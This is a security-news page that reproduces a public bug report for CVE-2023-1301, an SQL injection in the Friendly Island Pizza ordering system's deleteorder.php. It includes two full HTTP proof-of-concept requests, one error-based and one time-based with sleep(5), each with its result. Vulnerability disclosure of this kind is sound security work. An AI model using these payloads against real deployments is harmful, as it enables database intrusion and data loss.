Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-1301: bug_report/SQLi-1.md at main · a-xsg/bug_report

A vulnerability, which was classified as critical, has been found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. Affected by this issue is some unknown functionality of the file deleteorder.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-222662 is the identifier assigned to this vulnerability.

CVE
Open in Source
#sql#vulnerability#web#windows#apple#php#auth#chrome#webkit

Permalink

Cannot retrieve contributors at this time

Friendly Island Pizza Website and Ordering System v1.0 has SQL injection

BUG_Author: a-xsg

Website source address:https://www.sourcecodester.com/php/14730/friendly-island-pizza-website-php-mysql.html

Vulnerability File: /friendlyispizzawebsite/deleteorder.php

GET parameter ‘id’ exists SQL injection vulnerability

Payload1:id=1’

GET /friendlyispizzawebsite/deleteorder.php?id=1%27 HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=aql7l22ttmd7fs98jtsq05lc6p
Connection: close

An error occurred in the sql statement

Payload2:id=1’ and (select 1 from (select(sleep(5)))a)–

GET /friendlyispizzawebsite/deleteorder.php?id=1%27%20and%20(select%201%20from%20(select(sleep(5)))a)--%20a HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=aql7l22ttmd7fs98jtsq05lc6p
Connection: close

Server response time is 5 seconds

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE